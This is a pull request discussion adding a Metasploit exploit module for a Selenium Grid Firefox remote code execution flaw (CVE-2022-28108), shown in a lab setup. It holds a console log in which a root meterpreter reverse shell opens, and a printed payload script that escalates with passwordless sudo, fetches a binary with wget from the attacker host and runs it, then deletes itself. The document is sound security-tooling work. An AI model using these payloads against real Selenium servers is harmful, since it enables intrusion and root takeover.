Add Selenium Firefox RCE module (CVE-2022-28108)

[Takahiro-Yoko]

One of #19753
Chrome PR: #19769
File read PR: #19781

A bit more unstable compared to Chrome. At least, the number of sessions must be fewer than maxSessions for the exploit to succeed.

Vulnerable Application

Selenium Server (Grid) <= 4.27.0 (latest version at the time of this writing)
allows CSRF because it permits non-JSON content types
such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.

The vulnerability affects:

* Selenium Server (Grid) <= 4.27.0 (latest version at the time of this writing)

This module was successfully tested on:

* selenium/standalone-firefox:3.141.59 installed with Docker on Ubuntu 24.04
* selenium/standalone-firefox:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
* selenium/standalone-firefox:4.6 installed with Docker on Ubuntu 24.04
* selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04

Installation

1. docker pull selenium/standalone-firefox:3.141.59

2. docker run -d -p 4444:4444 -p 7900:7900 --shm-size="2g" selenium/standalone-firefox:3.141.59

Verification Steps

1. Install the application
2. Start msfconsole
3. Do: use exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108
4. Do: run lhost=<lhost> rhost=<rhost>
5. You should get a meterpreter

Options

TIMEOUT (required)

This is the amount of time (in seconds) that the module will wait for the payload to be
executed. Defaults to 75 seconds.

Scenarios

msf6 > use exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4445
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable.
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:54866) at 2024-12-30 13:04:18 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.17.0.3
OS           : Ubuntu 20.04 (Linux 6.8.0-51-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

[bcoles]

Presumably this will fail unless the user running Selenium can elevate to root (without a password)?

Obtaining a low-privileged shell is likely to be a more robust approach. If the user has permission to elevate privileges with passwordless sudo, the operator can elevate their session themselves.

[Takahiro-Yoko]

Thanks!

When using this exploit against the official Selenium Docker image, we need to elevate to root (which can be done without a password) for the exploit to succeed. The normal seluser may not have the necessary permissions to execute the payload. However, this isn't always the case, so I added a check to determine whether the user can elevate to root without a password. 43230b0 Does this approach seem acceptable?

[bcoles]

' and " are bad characters for the payload. This could be avoided by using an additional layer of encoding, such as base64.

[Takahiro-Yoko]

Thanks! I updated it to avoid using single quotes. cb34508

[bcoles]

What is the purpose of the rm -rf $0 here?

[Takahiro-Yoko]

When I replace rm -rf $0 with echo $0 > /tmp/whatisthis, the result of cat /tmp/whatisthis is /tmp/jus1lPj+. The result of cat /tmp/jus1lPj+ is:

echo $0 >/tmp/whatisthis
if sudo -n true 2>/dev/null; then
  sudo su root -c 'wget -qO ./XpnSbDIBRf http://192.168.56.1:8080/ndMYiHwpoiRjImNJZrt2GA; chmod +x ./XpnSbDIBRf; ./XpnSbDIBRf&'
else
  wget -qO ./XpnSbDIBRf http://192.168.56.1:8080/ndMYiHwpoiRjImNJZrt2GA; chmod +x ./XpnSbDIBRf; ./XpnSbDIBRf&
fi

When I replace echo $0 > /tmp/whatisthis with rm -rf $0, there is no file equivalent to /tmp/jus1lPj+.

So, I believe the purpose of rm -rf $0 is to clean up after the payload.